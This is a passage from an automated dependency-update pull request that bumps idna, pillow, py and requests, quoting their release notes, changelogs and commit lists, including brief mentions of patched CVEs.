optimize-contextj\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/cd58a23173d2b0a40b95ee680baf3e59e8d33966\"\u003e\u003ccode\u003ecd58a23\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/kjd/idna/issues/152\"\u003e#152\u003c/a\u003e from elliotwutingfeng/dev\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/5beb28b9dd77912c0dd656d8b0fdba3eb80222e7\"\u003e\u003ccode\u003e5beb28b\u003c/code\u003e\u003c/a\u003e More efficient resolution of joiner contexts\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/1b121483ed04d9576a1291758f537e1318cddc8b\"\u003e\u003ccode\u003e1b12148\u003c/code\u003e\u003c/a\u003e Update ossf/scorecard-action to v2.3.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/d516b874c3388047934938a500c7488d52c4e067\"\u003e\u003ccode\u003ed516b87\u003c/code\u003e\u003c/a\u003e Update Github actions/checkout to v4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/c095c75943413c75ebf8ac74179757031b7f80b7\"\u003e\u003ccode\u003ec095c75\u003c/code\u003e\u003c/a\u003e Merge branch 'master' into dev\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/60a0a4cb61ec6834d74306bd8a1fa46daac94c98\"\u003e\u003ccode\u003e60a0a4c\u003c/code\u003e\u003c/a\u003e Fix typo in GitHub Actions workflow key\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/5918a0ef8034379c2e409ae93ee11d24295bb201\"\u003e\u003ccode\u003e5918a0e\u003c/code\u003e\u003c/a\u003e Merge branch 'master' into dev\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/kjd/idna/compare/v2.10...v3.7\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `pillow` from 8.2.0 to 10.3.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/python-pillow/Pillow/releases\"\u003epillow's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e10.3.0\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://pillow.readthedocs.io/en/stable/releasenotes/10.3.0.html\"\u003ehttps://pillow.readthedocs.io/en/stable/releasenotes/10.3.0.html\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eDeprecations\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeprecate eval(), replacing it with lambda_eval() and unsafe_eval() \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7927\"\u003e#7927\u003c/a\u003e [\u003ca href=\"https://github.com/hugovk\"\u003e\u003ccode\u003e@​hugovk\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eDeprecate ImageCms constants and versions() function \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7702\"\u003e#7702\u003c/a\u003e [\u003ca href=\"https://github.com/nulano\"\u003e\u003ccode\u003e@​nulano\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eChanges\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-28219: Use strncpy to avoid buffer overflow \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7928\"\u003e#7928\u003c/a\u003e [\u003ca href=\"https://github.com/hugovk\"\u003e\u003ccode\u003e@​hugovk\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eUse \u003ccode\u003efunctools.lru_cache\u003c/code\u003e for \u003ccode\u003ehopper()\u003c/code\u003e \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7912\"\u003e#7912\u003c/a\u003e [\u003ca href=\"https://github.com/hugovk\"\u003e\u003ccode\u003e@​hugovk\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eRaise ValueError if seeking to greater than offset-sized integer in TIFF \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7883\"\u003e#7883\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eImprove speed of loading QOI images \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7925\"\u003e#7925\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eAdded RGB to I;16N conversion \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7920\"\u003e#7920\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eAdd --report argument to \u003cstrong\u003emain\u003c/strong\u003e.py to omit supported formats \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7818\"\u003e#7818\u003c/a\u003e [\u003ca href=\"https://github.com/nulano\"\u003e\u003ccode\u003e@​nulano\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eAdded RGB to I;16, I;16L and I;16B conversion \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7918\"\u003e#7918\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eFix editable installation with custom build backend and configuration options \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7658\"\u003e#7658\u003c/a\u003e [\u003ca href=\"https://github.com/nulano\"\u003e\u003ccode\u003e@​nulano\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eFix putdata() for I;16N on big-endian \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7209\"\u003e#7209\u003c/a\u003e [\u003ca href=\"https://github.com/Yay295\"\u003e\u003ccode\u003e@​Yay295\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eDetermine MPO size from markers, not EXIF data \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7884\"\u003e#7884\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eImproved conversion from RGB to RGBa, LA and La \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7888\"\u003e#7888\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eSupport FITS images with GZIP_1 compression \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7894\"\u003e#7894\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eUse I;16 mode for 9-bit JPEG 2000 images \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7900\"\u003e#7900\u003c/a\u003e [\u003ca href=\"https://github.com/scaramallion\"\u003e\u003ccode\u003e@​scaramallion\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eRaise ValueError if kmeans is negative \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7891\"\u003e#7891\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eRemove TIFF tag OSUBFILETYPE when saving using libtiff \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7893\"\u003e#7893\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eRaise ValueError for negative values when loading P1-P3 PPM images \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7882\"\u003e#7882\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eAdded reading of JPEG2000 palettes \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7870\"\u003e#7870\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eAdded alpha_quality argument when saving WebP images \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7872\"\u003e#7872\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eFixed joined corners for ImageDraw rounded_rectangle() non-integer dimensions \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7881\"\u003e#7881\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eRemoved Python and NumPy pinning on Cygwin \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7880\"\u003e#7880\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eUpdate UnidentifiedImageError and \u003cstrong\u003eversion\u003c/strong\u003e imports \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7644\"\u003e#7644\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eStop reading EPS image at EOF marker \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7753\"\u003e#7753\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003ePSD layer co-ordinates may be negative \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7706\"\u003e#7706\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eUse subprocess with CREATE_NO_WINDOW flag in ImageShow WindowsViewer \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7791\"\u003e#7791\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eWhen saving GIF frame that restores to background color, do not fill identical pixels \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7788\"\u003e#7788\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eFixed reading PNG iCCP compression method \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7823\"\u003e#7823\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eAllow writing IFDRational to UNDEFINED tag \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7840\"\u003e#7840\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eFix logged tag name when loading Exif data \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7842\"\u003e#7842\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eUse maximum frame size in IHDR chunk when saving APNG images \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7821\"\u003e#7821\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003ePrevent opening P TGA images without a palette \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7797\"\u003e#7797\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eUse palette when loading ICO images \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7798\"\u003e#7798\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eUse consistent arguments for load_read and load_seek \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7713\"\u003e#7713\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eTurn off nullability warnings for macOS SDK \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7827\"\u003e#7827\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eFix shift-sign issue in Convert.c \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7838\"\u003e#7838\u003c/a\u003e [\u003ca href=\"https://github.com/r-barnes\"\u003e\u003ccode\u003e@​r-barnes\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003ewinbuild: Refactor dependency versions into constants \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7843\"\u003e#7843\u003c/a\u003e [\u003ca href=\"https://github.com/hugovk\"\u003e\u003ccode\u003e@​hugovk\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eBuild macOS arm64 wheels natively \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7852\"\u003e#7852\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eFixed typo \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7855\"\u003e#7855\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eOpen 16-bit grayscale PNGs as I;16 \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7849\"\u003e#7849\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eHandle truncated chunks at the end of PNG images \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7709\"\u003e#7709\u003c/a\u003e [\u003ca href=\"https://github.com/lajiyuan\"\u003e\u003ccode\u003e@​lajiyuan\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eMatch mask size to pasted image size in GifImagePlugin \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7779\"\u003e#7779\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/python-pillow/Pillow/blob/main/CHANGES.rst\"\u003epillow's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e10.3.0 (2024-04-01)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eCVE-2024-28219: Use \u003ccode\u003estrncpy\u003c/code\u003e to avoid buffer overflow \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7928\"\u003e#7928\u003c/a\u003e\n[radarhere, hugovk]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eDeprecate \u003ccode\u003eeval()\u003c/code\u003e, replacing it with \u003ccode\u003elambda_eval()\u003c/code\u003e and \u003ccode\u003eunsafe_eval()\u003c/code\u003e \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7927\"\u003e#7927\u003c/a\u003e\n[radarhere, hugovk]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eRaise \u003ccode\u003eValueError\u003c/code\u003e if seeking to greater than offset-sized integer in TIFF \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7883\"\u003e#7883\u003c/a\u003e\n[radarhere]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eAdd \u003ccode\u003e--report\u003c/code\u003e argument to \u003ccode\u003e__main__.py\u003c/code\u003e to omit supported formats \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7818\"\u003e#7818\u003c/a\u003e\n[nulano, radarhere, hugovk]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eAdded RGB to I;16, I;16L, I;16B and I;16N conversion \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7918\"\u003e#7918\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7920\"\u003e#7920\u003c/a\u003e\n[radarhere]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix editable installation with custom build backend and configuration options \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7658\"\u003e#7658\u003c/a\u003e\n[nulano, radarhere]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix putdata() for I;16N on big-endian \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7209\"\u003e#7209\u003c/a\u003e\n[Yay295, hugovk, radarhere]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eDetermine MPO size from markers, not EXIF data \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7884\"\u003e#7884\u003c/a\u003e\n[radarhere]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eImproved conversion from RGB to RGBa, LA and La \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7888\"\u003e#7888\u003c/a\u003e\n[radarhere]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSupport FITS images with GZIP_1 compression \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7894\"\u003e#7894\u003c/a\u003e\n[radarhere]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eUse I;16 mode for 9-bit JPEG 2000 images \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7900\"\u003e#7900\u003c/a\u003e\n[scaramallion, radarhere]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eRaise ValueError if kmeans is negative \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7891\"\u003e#7891\u003c/a\u003e\n[radarhere]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eRemove TIFF tag OSUBFILETYPE when saving using libtiff \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7893\"\u003e#7893\u003c/a\u003e\n[radarhere]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eRaise ValueError for negative values when loading P1-P3 PPM images \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7882\"\u003e#7882\u003c/a\u003e\n[radarhere]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eAdded reading of JPEG2000 palettes \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7870\"\u003e#7870\u003c/a\u003e\n[radarhere]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eAdded alpha_quality argument when saving WebP images \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7872\"\u003e#7872\u003c/a\u003e\n[radarhere]\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-pillow/Pillow/commit/5c89d88eee199ba53f64581ea39b6a1bc52feb1a\"\u003e\u003ccode\u003e5c89d88\u003c/code\u003e\u003c/a\u003e 10.3.0 version bump\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-pillow/Pillow/commit/63cbfcfdea2d163ec93bae8d283fcfe4b73b5dc7\"\u003e\u003ccode\u003e63cbfcf\u003c/code\u003e\u003c/a\u003e Update CHANGES.rst [ci skip]\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-pillow/Pillow/commit/2776126aa9af322b416eaca247f4f8ebefd08128\"\u003e\u003ccode\u003e2776126\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7928\"\u003e#7928\u003c/a\u003e from python-pillow/lcms\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-pillow/Pillow/commit/aeb51cbb169eb3285818ba1390ddf2771d897e6e\"\u003e\u003ccode\u003eaeb51cb\u003c/code\u003e\u003c/a\u003e Merge branch 'main' into lcms\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-pillow/Pillow/commit/5beb0b66648db8b542bb5260eed79b25e33d643b\"\u003e\u003ccode\u003e5beb0b6\u003c/code\u003e\u003c/a\u003e Update CHANGES.rst [ci skip]\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-pillow/Pillow/commit/cac6ffa7b399ea79b6239984d1307056a0b19af2\"\u003e\u003ccode\u003ecac6ffa\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7927\"\u003e#7927\u003c/a\u003e from python-pillow/imagemath\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-pillow/Pillow/commit/f5eeeacf7539eaa0d93a677d7666bc7c142c8d1c\"\u003e\u003ccode\u003ef5eeeac\u003c/code\u003e\u003c/a\u003e Name as 'options' in lambda_eval and unsafe_eval, but '_dict' in deprecated eval\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-pillow/Pillow/commit/facf3af93dabcbdd8cdbda8c3b50eefafa3bb04c\"\u003e\u003ccode\u003efacf3af\u003c/code\u003e\u003c/a\u003e Added release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-pillow/Pillow/commit/2a93aba5cfcf6e241ab4f9392c13e3b74032c061\"\u003e\u003ccode\u003e2a93aba\u003c/code\u003e\u003c/a\u003e Use strncpy to avoid buffer overflow\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-pillow/Pillow/commit/a670597bc30e9d489656fc9d807170b8f3d7ca57\"\u003e\u003ccode\u003ea670597\u003c/code\u003e\u003c/a\u003e Update CHANGES.rst [ci skip]\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/python-pillow/Pillow/compare/8.2.0...10.3.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `py` from 1.10.0 to 1.11.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pytest-dev/py/blob/master/CHANGELOG.rst\"\u003epy's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e1.11.0 (2021-11-04)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eSupport Python 3.11\u003c/li\u003e\n\u003cli\u003eSupport \u003ccode\u003eNO_COLOR\u003c/code\u003e environment variable\u003c/li\u003e\n\u003cli\u003eUpdate vendored apipkg: 1.5 =\u0026gt; 2.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/447bac514febbb5433963582103d48bb27b3db17\"\u003e\u003ccode\u003e447bac5\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/6d003d9fee08542b9a5ca663568cb30c75d6c27c\"\u003e\u003ccode\u003e6d003d9\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/9cf613f3c21ca31f4a1ee9a70e6bd31dc3fe42d9\"\u003e\u003ccode\u003e9cf613f\u003c/code\u003e\u003c/a\u003e Declare support for Python 3.8-3.10\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/d831150a3502363c9ca7242122d8e6cbd229169e\"\u003e\u003ccode\u003ed831150\u003c/code\u003e\u003c/a\u003e Update python_requires: Python 3.4 was already dropped\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e68532e9d67b089b17f1c96a708ff5f8ccf8bc8b\"\u003e\u003ccode\u003ee68532e\u003c/code\u003e\u003c/a\u003e Update CHANGELOG for 1.11.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/2f03e5a7fd9eb95db110cfd1bf40b987757f9d48\"\u003e\u003ccode\u003e2f03e5a\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/258\"\u003e#258\u003c/a\u003e from blueyed/NO_COLOR\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e116b2bb8e1da9e8aef33c3606bd3d357ae28570\"\u003e\u003ccode\u003ee116b2b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/275\"\u003e#275\u003c/a\u003e from pytest-dev/upgrade-vendor-libs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f3a1a59d7d701a76680c2d0b0bd582311b00ded0\"\u003e\u003ccode\u003ef3a1a59\u003c/code\u003e\u003c/a\u003e remove build pin again\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f6cbf2814a2cc355d0a795233a32dc1285eec93b\"\u003e\u003ccode\u003ef6cbf28\u003c/code\u003e\u003c/a\u003e try to use pipx tox\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/3fe9ad76257860bfcdb25a23539972759ce348ed\"\u003e\u003ccode\u003e3fe9ad7\u003c/code\u003e\u003c/a\u003e try to use preinstalled tox\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pytest-dev/py/compare/1.10.0...1.11.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `requests` from 2.24.0 to 2.32.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/releases\"\u003erequests's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.32.4\u003c/h2\u003e\n\u003ch2\u003e2.32.4 (2025-06-10)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-47081 Fixed an issue where a maliciously crafted URL and trusted\nenvironment will retrieve credentials for the wrong hostname/machine from a\nnetrc file. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6965\"\u003e#6965\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNumerous documentation 